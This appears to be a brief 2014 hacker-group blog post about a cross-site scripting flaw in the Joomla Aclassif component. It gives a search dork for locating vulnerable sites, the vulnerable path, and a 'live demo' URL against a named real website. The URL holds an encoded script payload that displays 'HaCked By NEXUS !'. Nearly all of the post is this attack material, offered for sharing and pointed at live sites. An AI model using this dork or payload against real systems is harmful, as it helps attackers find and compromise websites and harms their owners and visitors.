Sunday, 6 July 2014

Joomla Aclassif - XSS

Dork:
inurl:"index.php?option=com_aclassif"

Exploit:
/index.php/component/aclassif/?

Example & Live Demo:
http://www.thegreekstar.com/index.php/component/aclassif/?%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,78,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E

 NEXUS - Sharing Is Caring